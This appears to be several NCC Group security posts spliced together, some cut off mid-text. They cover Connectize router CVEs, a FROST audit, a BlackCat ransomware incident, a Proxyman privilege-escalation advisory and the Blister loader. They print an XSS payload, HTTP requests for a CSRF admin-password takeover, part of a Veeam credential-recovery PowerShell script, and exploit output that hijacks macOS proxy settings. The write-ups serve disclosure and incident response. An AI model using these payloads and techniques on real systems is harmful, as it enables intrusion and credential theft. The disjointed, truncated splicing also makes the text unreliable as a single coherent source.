The Connectize Router uses the admin panel password, as set by the user, as the root password on the device. The password is stored in /etc/passwd, and appears to be hashed using DES. DES is a known insecure hashing algorithm that should no longer be used. Because this hash can be performed very quickly, hashed passwords are vulnerable to brute-force cracking. An attacker with access to the hashed passwords is likely to be able to recover significant numbers of plaintext passwords using a tool such as hashcat.
Several other important passwords, such as the SMB fileshare password, were also observed to be hashed using DES.
Recommendation
Update the hashing algorithms used for device credentials to a more secure, modern algorithm. Furthermore, consider setting the root machine password to it’s own unique value, rather than setting it by the admin configuration panel password.
Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24048
Severity: Medium 7.5 (CVSS v3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
Summary
The web application authentication relies on state tracking to ensure that the user is properly authenticated. This can be bypassed, allowing unauthenticated users to submit requests to the application under certain conditions.
Impact
If an authenticated user visits an attacker-controlled website, the attacker could induce the victim’s browser to send local requests to the application on behalf of the victim user. These requests could be used to make changes to the site, such as changing the admin password or configuring remote logs. It could also be used to leverage other vulnerabilities, such as CVE-2023-24046, a command line injection vulnerability.
In order to perform this attack, the victim must be logged in to the administration panel on the device’s network, but the attacker can be positioned anywhere on the public internet.
Details
The Connectize admin panel application appears to track authentication via two mechanisms. First, ensuring the user is logged in (likely via IP based or MAC address based verification). Next, it tracks the recent actions taken by the user in an attempt to verify that the request was sent as part of the typical user activity flow. This second check can be bypassed in a way that grants any individual who launches a phishing campaign against a logged-in administrator access to the admin panel. This can be done using an attack known as CSRF, which is explained below.
The lack of sufficient protections illustrated in this finding apply to the whole application, but are most significant in the user flow for changing the administrator password. This flow begins with a POST request to /boafrm/formPasswordSetup.
If a user sends this request without being logged in, they are redirected to the login page. If, however, a user sends this request while being logged in but before they have accessed the password request page at http://192.168.5.1/man_password.htm, they are assumed to have bypassed the normal user flow of the application and served a 403 Forbidden error. This appears to be intended to insure that only the authenticated user may send requests to the application as part of normal administrative duties.
However, an attacker can successfully fill the required conditions for this request by simply sending a HTTP GET request to the man_password.htm page, such as the following.
GET /man_password.htm HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.1/advanced.htm
Connection: close
Upgrade-Insecure-Requests: 1
They then receive a HTTP 200 response containing the contents of the web page.
An attacker, therefore, could bypass this check and allow themselves to programmatically change the password by simply using a tool or writing a script that sent the GET request to /man_password.htm shortly before performing the POST request to /boafrm/formPasswordSetup and changing the administrator password.
This attack can be through a phishing attack prompting the victim to navigate to an attacker’s website. The webpage would be configured as follows: Upon browsing to the website, the page sends a GET request from the victim’s browser to the address http://192.168.5.1/man_password.htm. If the victim has a Connectize G6 router and is currently logged in to the admin panel, this will respond with a 200 OK. The webpage would then send the second request, a POST request to http://192.168.5.1//boafrm/formPasswordSetup. This request will reset the victim’s router, and change the admin password to anything the attacker desires. They then have complete control of the router, and can send additional requests using their phishing site to make changes and configure the application as they wish. They could even make use of other findings, such as CVE-2023-24046, to take complete command of the device.
This type of attack is known as Cross-Site Request Forgery (CSRF). It is characterized by an attacker using a logged in victim’s session to perform actions on their behalf. CSRF is typically an attack that requires the victim to open the vulnerable website and the attacker’s phishing website, to transfer authentication cookies along with the requests. However, because the Connectize G6 router does not make use of session tokens, authentication cookies, or CSRF tokens, the attack works even if the phishing website is viewed in a different browser on the same machine that the victim had loaded the Connectize G6 admin panel on.
Recommendation
Implement a CSRF token as part of the authentication model. If possible, replace the state-based authentication with a more traditional authentication system, such as session cookie based authentication.
Applications can be protected from CSRF attacks by rejecting state-changing requests that do not originate from the application itself. The primary method of verifying that a request originated from the application rather than an external site is to require all state-changing requests to contain an extra parameter known as a CSRF token. These tokens are random values generated by the server, then returned to the browser in the body of a response or in a cookie submitted as an additional parameter with every request.
Because an attacking site cannot read the application’s cookies or responses, they will be unable to submit the correct value, and any forged request will be rejected.
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24049
Severity: Medium 4.6 (CVSS v3.1 AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L)
Summary
It was found that the default password to both the router and the admin panel of the Connectize G6 router were trivially guessable by attackers, and are not required to be reset upon initial configuration.
Furthermore, the router provides the option to automatically set the admin panel password to the same password used to connect to the Wi-Fi.
Impact
An attacker present on the 2.4 or 5 GHz Wi-Fi Networks could trivially guess both the Wi-Fi network password and the admin password, if they have been left unchanged from their factory default. This would allow the attacker to gain complete admin access to the router.
Additionally, in some configurations, a user with credentials sufficient to connect to the Wi-Fi network could have full admin access to the router by default.
Details
The device default Wi-Fi password is admin, as described both in the router instruction manual and the sticker at the bottom of the sheet. This password can also be used to log on to the configuration panel.
Upon initial setup, the user is prompted to set a new password. However, they can bypass this by selecting the “Skip Wizard” option, leaving the passwords at the default.
Furthermore, if a user does proceed to set a new Wi-Fi password, they are presented with a checkbox that sets the admin panel login password to the same value as the Wi-Fi password. This grants full administrative access to all users with access to the Wi-Fi password, even when a non-default password is used.
Recommendation
Connectize should ensure that the router requires users to always change the Wi-Fi password from default upon first login, and should remove the “Skip Wizard” functionality that allows users to bypass this.
Additionally, Connectize should remove the option to set the admin interface password to the same password as the Wi-Fi password shown during initial configuration.
Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24050
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L)
Summary
An attacker who can change the Wi-Fi password can change the password to a carefully crafted Cross Site Scripting string, such as "><script>alert(1)</script>. This string is stored in the router’s data storage application, then incorporated in pages throughout the application, allowing an attacker to run arbitrary JavaScript whenever the string is loaded onto a page.
As this finding requires an attacker to be authenticated, the impact is somewhat limited. However, it can be exploited unauthenticated when combined with attacks such as CVE-2023-24048. Additionally, in a circumstance where multiple individuals share the admin panel credentials, one user could run arbitrary JavaScript in the browsers of all other users.
Impact
An attacker that has gained access to the admin panel can run arbitrary JavaScript code whenever anyone logs in or views various pages in the admin panel. This could be used to query external webpages, steal sensitive information, or perform other privileged actions.
Details
Cross-site scripting (XSS) is a vulnerability class related to web application input and output validation. In stored cross-site scripting, the application accepts input from an end user, stores it, and later displays it without properly encoding HTML metacharacters. This allows an attacker to inject JavaScript code into future views of the resulting page. A user may fall victim to the attack just by using the application, provided that they have connected to either of the Wi-Fi networks or the LAN network provided by the router.
The attacker does not need to change the passwords for both the 2.4 and 5 GHz bands. Simply changing one is sufficient, potentially allowing this attack to go undetected by people using the other network.
Recommendation
When including user submitted data in responses to end users, encode the output based on the appropriate context of where the output is included.
Content placed into HTML needs to be HTML-encoded. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands. User-submitted data should not be included in dynamically-generated JavaScript snippets. Instead, encode and return the content in a separate HTML element or API request.
Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24051
Severity: Medium 4.3 (CVSS v3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Summary
Applications often make use of rate limiting to prevent brute-force password attempts, sometimes enforced via “locking out” a user and preventing them from making further attempts at guessing the password. The Connectize G6 admin panel contains this functionality, but enforces it on the client-side. This allows a user to bypass it in two different ways.
Impact
An attacker attempting to guess the admin password for the router could make as many attempts as they wish without any limitations or restrictions. Given that the minimum password length is 5 characters, an attacker’s ability to guess the admin password is only limited by their network speed. An attacker with a sufficiently good connection could iterate through all possible five-character passwords reasonably quickly, gaining complete control of the admin panel if a password of minimum length was set.
Details
There are two methods to bypass the lockout functionality. Anyone accessing the user interface at 192.168.5.1 via a web browser may attempt to guess the password. After three failed attempts, a popup informs the user they must wait 180 seconds before guessing again.
If the user then refreshes the page, the popup is no longer shown, and the user may make another guess. If this guess is correct, the user is logged in to the admin panel, bypassing the lockout.
Alternatively, a user submitting HTTP requests directly to the application, such as through tools like Burp Suite or Postman, is never shown this prompt to begin with. Failed login requests return a HTTP 302 redirecting the user to the login page, while successful ones redirect the user to the index of the application.
An attacker could trivially automate sending hundreds or thousands of requests in this way, and never encounter the lockout mechanism.
Recommendation
Ensure that the rate limiting is implemented in the application’s server side code, rather than the client side JavaScript. They should also prevent both of these bypasses from occurring, and help mitigate brute force attacks against the application.
Current Password Not Required When Changing Admin Password (CVE-2023-24052)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24052
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N)
Summary
The admin panel web application does not require the user to provide the current admin password when changing the credentials.
Impact
An attacker who has gained access to the admin panel without obtaining the credentials first could change the password, locking out the legitimate users and granting themselves indefinite access until the device is factory reset.
Details
It is considered best practice to require a user to authenticate before changing or accessing sensitive information, such as an administrative password. A user who gains access to the admin panel via an unrelated vulnerability, or via access to a logged in computer owned by the legitimate user, could trivially change the password.
Given that the admin panel is also vulnerable to CSRF attacks, as described in CVE-2023-24048, this in effect allows anyone who is successful in a CSRF phishing attempt to change the admin password.
Recommendation
Require users to provide the old password when they change the administrator password.
Disclosure Timeline
March 3rd, 2023: NCC reached out to Connectize, announcing to the vendor that vulnerabilities were found in one of their devices and attempting to initiate secure conversation regarding these vulnerabilities.
April 7th, 2023: NCC reached out to Connectize again (not having heard from them in response to the prior email) to inform them of intent to publicly disclose the bugs unless they can confirm they respond to us within the next 30 days.
As of the publishing date of this Technical Advisory, no further communication has occurred and it appears that the Connectize vendor has ceased trading.
It is important that consumers are aware of the vulnerable Connectize devices. Any current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Similarly, for consumers looking to purchase a Wi-Fi router – be aware that at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background NCC Group is currently liaising with some of these online stores in an attempt at ensuring these devices are withdrawn from sale.
Thanks to
David Goldsmith, Nicholas Bidron, and Eli Sohl for their support throughout the research and disclosure process.
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
In Summer 2023, the Zcash Foundation engaged NCC Group to conduct a security assessment of the Foundation’s FROST threshold signature implementation, based on the paper FROST: Flexible Round-Optimized Schnorr Threshold Signatures. This project implements v12 of the draft FROST specification in Rust, with a variety of options available for underlying elliptic curve groups. The review was performed by three consultants over 25 person-days of effort. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.
Authors: Alex Jessop @ThisIsFineChief, Molly Dewis
While the main trend in the cyber threat landscape in recent months has been MoveIt and Cl0p, NCC Groups’ Cyber Incident Response Team have also been handling multiple different ransomware groups over the same period.
In the ever-evolving cybersecurity landscape, one consistent trend witnessed in recent years is the unsettling rise in ransomware attacks. These nefarious acts of digital extortion have left countless victims scrambling to safeguard their data, resources, and even their livelihoods. To counter this threat, every person in the cyber security theatre has a responsibility to shine light on current threat actor Tactics, Techniques and Procedures (TTP’S) to assist in improving defences and the overall threat landscape.
This series will focus on TTP’s deployed by four ransomware families recently observed during NCC Group’s incident response engagements. The ransomware families that will be explored are:
BlackCat – Also known as ALPHV, first observed in 2021, is a Ransomware-as-a-Service (Raas) often using the double extortion method for monetary gain.
Donut –The D0nut extortion group was first reported in August 2022 [1] for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released with speculation that the ransomware deployed by the group was linked to HelloXD ransomware [2]. There is also suspected links between D0nut affiliates and both Hive and Ragnar Locker ransomware operations.
Medusa – Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims.
NoEscape – At the end of May 2023, a newly emerged Ransomware-as-a-Service (RaaS) was observed on a cybercrime forum named NoEscape.
Join us as we delve into the inner workings of these ransomware families, gaining a better understanding of their motivations, attack vectors and TTPS.
To begin our deep dive we will start with…
Not so lucky: BlackCat is back!
Summary
This first post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving BlackCat Ransomware.
Below provides a summary of findings which are presented in this blog post:
Installation of various services.
Creation of new accounts.
Modification and deletion activity.
Credential dumping activity.
Use of remote access applications.
Data staging.
Presence of MEGAsync.
Analysis of the ransomware executable.
BlackCat
BlackCat ransomware, also known as ALPHV, is a Rust-based variant that was first seen in November 2021. BlackCat has been provided as a ransomware-as-a-service (RaaS) model and is an example of a double-extortion ransomware where data once encrypted, is exfiltrated and the victim is threatened to have their data published if the ransom is not paid [1]. The group behind BlackCat ransomware can be characterised as financially motivated. BlackCat ransomware targets no specific industry and has the capability to encrypt both Windows and Linux hosts. BlackCat ransomware uses AES to encrypt files or ChaCha20 if AES is not supported due to the hardware of the system [4].
Incident Overview
In this incident, the initial access vector was unknown. Prior to the execution of the ransomware, a wide variety of activity was observed such as the installation of new services, creation of new accounts and data staging. Data was believed to have been exfiltrated due to the techniques employed, however, no data was published to the leak site.
Maintaining access to the victim’s environment was achieved by the threat actor creating a new Administrator account and a new default admin user, azure.
Additionally, a Total Software Deployment Audit Service Windows service was installed (see below); likely to maintain persistence on the affected host. Total Software Deployment supports group deployment, maintenance, and uninstallation of software packages. BlackCat ransomware is known to use Total Software Deployment [3].
The ransomware payload, min.exe, using fsutil behavior set SymlinkEvaluation R2R:1 to redirect file system access to a different location once access to the network is gained.
Credential Access
Various techniques to gather credentials were employed by the threat actor.
Due to the presence of Veeam in the victim’s environment, C:\PerfLogs\Veeam-Get-Creds.ps1 below was leveraged to recover passwords used by Veeam to connect to remote hosts.
# About: The script is designed to recover passwords used by Veeam to connect # to remote hosts vSphere, Hyper-V, etc. The script is intended for # demonstration and academic purposes. Use with permission from the # system owner. # # Author: Konstantin Burov. # # Usage: Run as administrator (elevated) in PowerShell on a host in a Veeam # server. Add-Type -assembly System.Security #Searching for connection parameters in the registry try { $VeaamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication\" $SqlDatabaseName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlDatabaseName $SqlInstanceName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlInstanceName $SqlServerName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlServerName } catch { echo "Can't find Veeam on localhost, try running as Administrator" exit -1 } "" "Found Veeam DB on " + $SqlServerName + "\" + $SqlInstanceName + "@
Events like the above and any others related to ScreenConnect activity can be found in Application.evtx.
Subsequently, evidence of a file named mimikatz.logwas observed. It is highly likely Mimikatz was leveraged by the threat actor to harvest credentials.
Finally, it is likely the threat actor enumerated C:\Windows\NTDS\ntds.dit as the following files were created: 1.txt.ntds, 1.txt.ntds.kerberos, 1.txt.ntds.cleartext. These files are from using Impacket [5].
Discovery
The threat actor used ScreenConnect to execute commands like ping <HOST NAME>.<DOMAIN NAME>.local. In some instances, the commands executed were not specified (see below) but a length of 33 can mean commands have been manually executed.
At the same time on another host, net.exe and net1.exe were executed. As net is often used by threat actors to gather system and network information, it is possible ScreenConnect was used to gather this type of information.
Analysis of the ransomware executable min.exefound that the UUID was obtained using: wmic csproduct get UUID.
Lateral Movement
The threat actor executed PsExec.exe. BlackCat has been known to use PsExec to replicate itself across connected servers [6].
Collection
Data staging was conducted by the threat actor as multiple .zip files were created that are believed to have been exfiltrated.
Additionally, one of the accounts compromised by the threat actor executed WinRAR. Across the time period of interest, folders on multiple drives were modified; the threat actor potentially accessed these folders.
Command and Control
Remote access applications, particularly ScreenConnect, were heavily utilised by the threat actor. ScreenConnect was used to start remote sessions, execute commands and transfer files. The threat actor transferred the following files: mimikatz.exe, MEGAsyncSetup64.exe, tsd-setup.exe, 121.msi* and 212.msi*.
Atera is used for remote monitoring and management and the Atera Agent is required for hosts to be monitored. It is likely Atera was used for persistence.
Splashtop allows hosts to be remotely accessed and was likely used for persistence especially as the Splashtop® Remote Service was observed going online. Splashtop events are also located in Application.evtx.
Exfiltration
Data staging was observed as a technique used by the threat actor. Multiple .zip files were created at the same time within C:\PerfLogs. It is believed these .zip files were exfiltrated.
For one of the compromised accounts, WinRAR was observed C:\Users\<USER>\Desktop\winrar-x64-621.exe. It is possible this utility was used for data exfiltration.
MEGAsync is a legitimate cloud storage solution, however, it is often used by threat actors for exfiltrating data. Due to its presence in the victim’s environment, it is highly likely the threat actor used MEGA to exfiltrate data.
MEGA was observed to once reside in the following locations:
Additionally, MEGA-related strings were recovered from the encrypted VMDKs:
MEGAsyncSetup64.exe
MEGAsync.exe
MEGA Website.lnk
MEGAsync.cfg.bak
MEGAsync.log
MEGAsync Update Task [SID]
MEGAsync.lnk
Impact
BlackCat ransomware was deployed to the affected domain in the form of min.exe. Data was encrypted and .dujcsfd was appended to files. A ransom note was dropped onto the compromised Windows servers.
min.exe
PsExec was highly likely used to distribute the ransomware across the affected domain as BlackCat has a built-in PsExec module [7].
Additionally, min.exehad the following command line options:
access-token: Access token.
paths: Only process files inside defined paths
no-net: Do not discover network shares on Windows.
no-prop : Do not self propagate (worm) on Windows.
no-wall: Do not update desktop wallpaper on Windows.
no-impers: Do not spawn impersonated processes on Windows.
no-vm-kill: Do not stop VMs on ESXI.
no-vm-snapshot-kill: Do not wipe VMs snapshots on EXSI.
no-vm-kill-names: Do not stop defined VMs on EXSI.
sleep-restart: Sleep for duration in seconds after successful run and then restart.
sleep-restart-duration: Keep soft persistence alive for duration in second. (24 hours by default).
sleep-restart-until: Keep soft persistence alive until defined UTC time in millis. (Defaults to 24 hours since launch).
no-prop-servers: Do not propagate to defined servers.
prop-file: Propagate specified file.
drop-drag-and-drop-target: Drop drag and drop target batch file.
drag-and-drop: Invoked with drag and drop.
log-file: Enable logging to specified file.
verbose: Log to console.
extra-verbose: Log more to console.
ui: Show user interface.
safeboot: Reboot in Safe Mode before running on Windows.
safeboot-network: Reboot in Safe Mode with Networking before running on Windows.
safeboot-instance: Run as safeboot instance on Windows.
propagated: Run as propagated process.
child: Run as child process.
bypass: Run as elevated process.
The configuration of min.execontained 23 elements [8]:
config_id: Configuration ID
extension: File extension appended to files.
public_key: RSA public key.
note_file_name: The file name of the ransom note.
note_full_text: The ransom note in full.
note_short_text: A shorter version of the ransom note.
Credentials: Credentials used by BlackCat.
default_file_mode: File encryption mode.
default_file_cipher: File encryption cipher.
kill_services: The services to terminate.
kill_processes: The processes to terminate.
exclude_directory_names: Does not encrypt the defined directories.
exclude_file_names: Does not encrypt the defined files.
exclude_file_extensions: Does not encrypt the defined extensions.
exclude_file_path_wildcard: Does not encrypt the defined file paths.
Vendor: Proxyman LLC
Vendor URL: https://proxyman.io/
Versions affected: com.proxyman.NSProxy.HelperTool version 1.4.0 (distributed with Proxyman.app up to and including versions 4.11.0)
Systems Affected: macOS
Author: Scott Leitch <mailto:[email protected]>
Advisory URL / CVE Identifier: CVE-2023-45732
Risk: Medium (Exploitation of this finding enables an attacker to redirect network traffic to an attacker-controlled location)
Summary
The com.proxyman.NSProxy.HelperTool application (version 1.4.0), a privileged helper tool distributed with the Proxyman application (up to an including versions 4.10.1) for macOS 13 Ventura and earlier allows a local attacker to use earlier versions of the Proxyman application to maliciously change the System Proxy settings and redirect traffic to an attacker-controlled computer, facilitating MITM attacks or other passive network monitoring.
The Proxyman application affected is a macOS native desktop application used for HTTP(S) proxying. The application distribution includes a helper service tool (com.proxyman.NSProxy.HelperTool) that is used to adjust system proxy settings. The main application communicates with this higher-privilege tool over XPC.
Impact
It is possible for a low-privilege attacker or otherwise malicious process to inconspicuously change the operating system’s HTTP(S) proxy settings, facilitating, e.g., MITM attacks.
Recommendation
Update to the HelperTool version 1.5.0 or higher, distributed with the most recent (4.13.0 as of writing) version of Proxyman.
Details
Much of the below is based heavily off of previous work by Csaba Fitzl, in particular his blogs which coincided with earlier CVEs:
The HelperTool class’s implemented (BOOL)listener:(NSXPCListener *) shouldAcceptNewConnection:(NSXPCConnection *) instance method defines six code-signing requirement strings. A process attempting to establish a valid XPC connection to the installed com.proxyman.NSProxy.HelperTool must satisfy one of these requirements.
/* @class HelperTool */
-(char)listener:(void *)arg2 shouldAcceptNewConnection:(void *)arg3 {
r14 = self;
rax = [arg3 retain];
r12 = rax;
rdx = [rax processIdentifier];
[r14 setConnectionPID:rdx];
var_60 = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x8) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Apple Development: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x10) = @"identifier \"com.proxyman.NSProxy\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x18) = @"identifier \"com.proxyman.NSProxy-setapp\" and anchor apple generic and certificate leaf[subject.CN] = \"Mac Developer: Pham Huy (4G5FB38W27)\" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */";
*( var_60 + 0x20) = @"anchor apple generic and identifier \"com.proxyman.NSProxy\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
*( var_60 + 0x28) = @"anchor apple generic and identifier \"com.proxyman.NSProxy-setapp\" and (certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = \"3X57WP8E8V\")";
rax = [NSArray arrayWithObjects:rdx count:0x6];
rax = [rax retain];
r15 = rax;
rcx = r12;
if ([r14 [[[[validateIncomingConnectionForAllCodeSigns:rax forConnection:rcx] != 0x0]]]]) {
rax = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol), rcx];
rax = [rax retain];
[r12 setExportedInterface:rax, rcx];
[rax release];
[r12 setExportedObject:r14, rcx];
[r12 resume];
r14 = 0x1;
}
A de-compilation of the listener:shouldAcceptNewConnection: instance method defined six potential security requirements before passing them to the validateIncomingConnectionForAllCodeSigns:forConnection: instance method.
The above de-compilation shows the method grouping the six strings into an NSArray and passing them into the HelperTool‘s validateIncomingConnectionForAllCodeSigns:forConnection: instance method. Looking into this instance method, we find that it will loop through the six code-signing requirement strings, each loop calling, in succession, SecCodeCopyGuestWithAttributes(), SecRequirementCreateWithString, and SecCodeCheckValidityWithErrors to determine that the calling binary is correctly signed and conforms to one of the six allowed requirement strings.
An attacker able to pass the above security requirement check is able to communicate with the HelperTool, tasked with managing the system’s proxy settings through a series of XPC service methods. Modern distributions of the main Proxyman.app bundle are all signed with the hardened runtime flag, preventing library injection attacks that would look to take advantage of this, but an old version of Proxyman still available, version 1.3.4, is not signed with any code-signing flags, allowing an attacker to abuse it as a vector through which they can pass the above security validation check to communicate with an up-to-date HelperTool distributed with recent versions of Proxyman, surreptitiously adjusting system proxy settings.
An old version of the Proxyman (1.3.4) application was signed without flags to protect against library injections and also contained the requisite TeamIdentifier.
We can determine the exposed XPC service methods using the class-dump tool. Though there are several methods it appears we may be able to communicate using, the most simple was legacySetProxySystemPreferencesWithAuthorization:(NSData *) enabled:(BOOL) host:(NSString *) port:(NSString *) reply:(void (^)(NSError *, BOOL)):
XPC service methods exposed by the com.proxyman.NSProxy.HelperTool service
Using this, it’s possible to build a dynamic library that can be force-loaded into the old Proxyman application that will, on startup, call to the XPC service and set the system’s proxy settings to attacker-controlled values. Some important code snippets are included below, with a full proof-of-concept source file included below.
Once authorization checks were passed, the dynamic library called the legacySetProxySystemPreferencesWithAuthorization and getVersionWithReply instance methods.
Once we compile the dynamic library we can then insert it into the old Proxyman application:
And using the below shell script ($ ./Poc.sh ./ProxyHelper_PoC.dylib <host> <port>), it is possible to execute the proof-of-concept exploitation against a fully updated Proxyman installation, changing the system’s proxy settings:
The exploit script will retrieve the old version of Proxyman, mount it, and inject the compiled dynamic library into it, exploiting the already-installed and up-to-date HelperTool.
$ ./PoC.sh ProxyHelper_PoC.dylib [[[[127.0.0.1 5555]]]]
[+] Changing to /var/folders/m5/h5w99qzx1zqdfj_bf8518h8w0000gn/T/
[+] Getting https://github.com/ProxymanApp/Proxyman/releases/download/1.3.4/Proxyman_1.3.4.dmg...
[+] Mounting DMG...
[+] Injecting dylib...
2023-08-31 16:46:38.856 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] OSStatus: No error.
2023-08-31 16:46:38.857 Proxyman[4504:166167] obj: <__NSXPCInterfaceProxy_HelperToolProtocol: 0x600002364000>
2023-08-31 16:46:38.857 Proxyman[4504:166167] conn: <NSXPCConnection: 0x600003169e00> connection to service named com.proxyman.NSProxy.HelperTool
2023-08-31 16:46:38.956 Proxyman[4504:166202] [+] Proxy set successfully!
2023-08-31 16:46:38.957 Proxyman[4504:166202] [+] HelperTool Version: 1.4.0
2023-08-31 16:46:39.358 Proxyman[4504:166167] [+] Done.
The exploit succeeded, changing the system’s proxy settings to http(s)://127.0.0.1:5555
With the exploit proof-of-concept successful, it is possible to open an nc listener to catch requests being sent from browsers running on the system:
Blister is a piece of malware that loads a payload embedded inside it. We provide an overview of payloads dropped by the Blister loader based on 137 unpacked samples from the past one and a half years and take a look at recent activity of Blister. The overview shows that since its support for environmental keying, most samples have this feature enabled, indicating that attackers mostly use Blister in a targeted manner. Furthermore, there has been a shift in payload type from Cobalt Strike to Mythic agents, matching with previous reporting. Blister drops the same type of Mythic agent which we thus far cannot link to any public Mythic agents. Another development is that its developers started obfuscating the first stage of Blister, making it more evasive. We provide YARA rules and scripts1 to help analyze the Mythic agent and the packer we observed with it.
Recap of Blister
Blister is a loader that loads a payload embedded inside it and in the past was observed with activity linked to Evil Corp2,3. Matching with public reporting, we have also seen it as a follow-up in SocGholish infections. In the past, we observed Blister mostly dropping Cobalt Strike beacons, yet current developments show a shift to Mythic agents, another red teaming framework.
Elastic Security first documented Blister in December 2021 in a campaign that used malicious installers4. It used valid code signatures referencing the company Blist LLC to pose as a legitimate executable, likely leading to the name Blister. That campaign reportedly dropped Cobalt Strike and BitRat.
In 2022, Blister started solely using the x86-64 instruction set, versus including 32-bit as well. Furthermore, RedCanary wrote observing SocGholish dropping Blister5, which was later confirmed by other vendors as well6.
In August the same year, we observed a new version of Blister. This update included more configuration options, along with an optional domain hash for environmental keying, allowing attackers to deploy Blister in a targeted manner. Elastic Security recently wrote about this version7.
2023 initially did not bring new developments for Blister. However, similar to its previous update, we observed development activity in August. Notably, we saw samples with added obfuscation to the first stage of Blister, i.e. the loader component that is injected into a legitimate executable. Additionally, in July, Unit 428 observed SocGholish dropping Blister with a Mythic agent.
In summary, 2023 brought new developments for Blister, with added obfuscations to the first stage and a new type of payload. The next part of this blog is divided into two parts: firstly, we look back at previous Blister payloads and configurations, and in the second part, we discuss the recent developments.
Looking back at Blister
In early 2023, we observed a SocGholish infection at our security operations center (SOC). We notified the customer and were given a binary that was related to the infection. This turned out to be a Blister sample, with Cobalt Strike as its payload.
We wrote an extractor that worked on the sample encountered at the SOC, but for certain other Blister samples it did not. It turned out that the sample from the SOC investigation belonged to a version of Blister that was introduced in August, 2022, while older samples had a different configuration. After writing an extractor for these older versions, we made an overview of what Blister had been dropping in roughly the past two years.
The samples we analyzed are all available on VirusTotal, the platform we used to find samples. We focus on 64-bit Blister samples, newer samples are not using 32-bit anymore, as far as we know. In total, we found 137 samples we could unpack, 33 samples with the older version and 104 samples with the newer version from 2022.
In the Appendix, we list these samples, where version 1 and 2 refer to the old and new version respectively. The table is sorted on the first seen date of a sample in VirusTotal, where you clearly see the introduction of the update.
